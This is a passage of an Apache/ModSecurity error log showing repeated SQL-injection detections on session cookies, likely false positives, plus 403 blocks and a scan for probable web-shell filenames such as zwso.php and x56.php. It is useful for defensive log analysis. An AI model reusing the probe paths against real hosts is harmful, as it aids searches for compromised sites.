[Tue May 12 03:44:44.042931 2026] [security2:error] [pid 1709071:tid 1709098] [client 172.104.186.23:46192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGCrvMumyrWMfSu7q6BQAAAMs"]
[Tue May 12 03:44:51.056709 2026] [security2:error] [pid 1730207:tid 1730229] [client 172.104.186.23:46572] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/beta"] [unique_id "agKGEzue9Sp-pIv_Bb6g1QAAAVQ"]
[Tue May 12 03:44:51.057034 2026] [security2:error] [pid 1730207:tid 1730229] [client 172.104.186.23:46572] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/beta"] [unique_id "agKGEzue9Sp-pIv_Bb6g1QAAAVQ"]
[Tue May 12 03:44:51.057421 2026] [security2:error] [pid 1730207:tid 1730229] [client 172.104.186.23:46572] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGEzue9Sp-pIv_Bb6g1QAAAVQ"]
[Tue May 12 03:45:04.519312 2026] [security2:error] [pid 1691274:tid 1691286] [client 172.104.186.23:53806] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGIFfdQaraX_prmqcviwAAAAk"]
[Tue May 12 03:45:04.519524 2026] [security2:error] [pid 1691274:tid 1691286] [client 172.104.186.23:53806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGIFfdQaraX_prmqcviwAAAAk"]
[Tue May 12 03:45:05.806031 2026] [security2:error] [pid 1691274:tid 1691286] [client 172.104.186.23:53806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGIFfdQaraX_prmqcviwAAAAk"]
[Tue May 12 03:45:47.104008 2026] [security2:error] [pid 1691274:tid 1691278] [client 144.124.226.124:64351] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: e43887280305308416d268d7170238c0||1778552138||1778551778"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agKGS1fdQaraX_prmqcvvAAAAAE"], referer: https://la-grande-fabrique.com/?p=1
[Tue May 12 03:45:47.104231 2026] [security2:error] [pid 1691274:tid 1691278] [client 144.124.226.124:64351] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agKGS1fdQaraX_prmqcvvAAAAAE"], referer: https://la-grande-fabrique.com/?p=1
[Tue May 12 03:45:47.104461 2026] [security2:error] [pid 1691274:tid 1691278] [client 144.124.226.124:64351] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp-comments-post.php"] [unique_id "agKGS1fdQaraX_prmqcvvAAAAAE"], referer: https://la-grande-fabrique.com/?p=1
[Tue May 12 03:45:50.898841 2026] [ssl:error] [pid 1691274:tid 1691284] (EAI 2)Name or service not known: [client 74.7.230.0:43500] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:45:50.898882 2026] [ssl:error] [pid 1691274:tid 1691284] AH01941: stapling_renew_response: responder error
[Tue May 12 03:45:55.975653 2026] [security2:error] [pid 1695975:tid 1695994] [client 172.104.186.23:42874] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/demo"] [unique_id "agKGU9VI9ymHBxup74-cFgAAAJA"]
[Tue May 12 03:45:55.975860 2026] [security2:error] [pid 1695975:tid 1695994] [client 172.104.186.23:42874] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/demo"] [unique_id "agKGU9VI9ymHBxup74-cFgAAAJA"]
[Tue May 12 03:45:55.976082 2026] [security2:error] [pid 1695975:tid 1695994] [client 172.104.186.23:42874] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGU9VI9ymHBxup74-cFgAAAJA"]
[Tue May 12 03:46:04.861970 2026] [authz_core:error] [pid 1691274:tid 1691289] [client 40.77.167.230:38796] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/Requests/library/error_log
[Tue May 12 03:46:08.400968 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGYHo6NvB9WXx5V-6L4wAAAQM"]
[Tue May 12 03:46:08.401189 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGYHo6NvB9WXx5V-6L4wAAAQM"]
[Tue May 12 03:46:09.601569 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGYHo6NvB9WXx5V-6L4wAAAQM"]
[Tue May 12 03:46:12.231996 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/backup"] [unique_id "agKGZLOxS7i6i_mT2NLaIgAAAEw"]
[Tue May 12 03:46:12.232195 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/backup"] [unique_id "agKGZLOxS7i6i_mT2NLaIgAAAEw"]
[Tue May 12 03:46:12.232401 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGZLOxS7i6i_mT2NLaIgAAAEw"]
[Tue May 12 03:46:12.980048 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGZHo6NvB9WXx5V-6L8AAAAQM"]
[Tue May 12 03:46:12.980260 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGZHo6NvB9WXx5V-6L8AAAAQM"]
[Tue May 12 03:46:13.582885 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGZHo6NvB9WXx5V-6L8AAAAQM"]
[Tue May 12 03:46:14.241532 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/dev"] [unique_id "agKGZrOxS7i6i_mT2NLaKQAAAEw"]
[Tue May 12 03:46:14.241743 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/dev"] [unique_id "agKGZrOxS7i6i_mT2NLaKQAAAEw"]
[Tue May 12 03:46:14.242001 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGZrOxS7i6i_mT2NLaKQAAAEw"]
[Tue May 12 03:46:16.041207 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/class-t.api.php
[Tue May 12 03:46:16.569532 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/zwso.php
[Tue May 12 03:46:16.679792 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGaHo6NvB9WXx5V-6L-QAAAQM"]
[Tue May 12 03:46:16.680008 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGaHo6NvB9WXx5V-6L-QAAAQM"]
[Tue May 12 03:46:17.050864 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/class19.php
[Tue May 12 03:46:17.260671 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGaHo6NvB9WXx5V-6L-QAAAQM"]
[Tue May 12 03:46:17.308141 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/class20.php
[Tue May 12 03:46:17.560007 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/staging"] [unique_id "agKGabOxS7i6i_mT2NLaMQAAAEw"]
[Tue May 12 03:46:17.560208 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/staging"] [unique_id "agKGabOxS7i6i_mT2NLaMQAAAEw"]
[Tue May 12 03:46:17.560446 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGabOxS7i6i_mT2NLaMQAAAEw"]
[Tue May 12 03:46:17.748801 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/admin.php
[Tue May 12 03:46:18.136209 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/randkeyword.php
[Tue May 12 03:46:18.430956 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/fwe.php
[Tue May 12 03:46:18.652397 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGano6NvB9WXx5V-6MAgAAAQM"]
[Tue May 12 03:46:18.652624 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKGano6NvB9WXx5V-6MAgAAAQM"]
[Tue May 12 03:46:18.919159 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/g.php
[Tue May 12 03:46:19.160416 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/tx1.php
[Tue May 12 03:46:19.261215 2026] [security2:error] [pid 1730175:tid 1730180] [client 172.104.186.23:54822] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKGano6NvB9WXx5V-6MAgAAAQM"]
[Tue May 12 03:46:19.402999 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/xv.php
[Tue May 12 03:46:19.640356 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/x56.php
[Tue May 12 03:46:19.920940 2026] [:error] [pid 1695975:tid 1695981] [client 52.242.216.199:7278] File does not exist: /home/piregwan/public_html/htaccess.php
[Tue May 12 03:46:20.103148 2026] [security2:error] [pid 1707624:tid 1707694] [client 172.104.186.23:59658] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/temp"] [unique_id 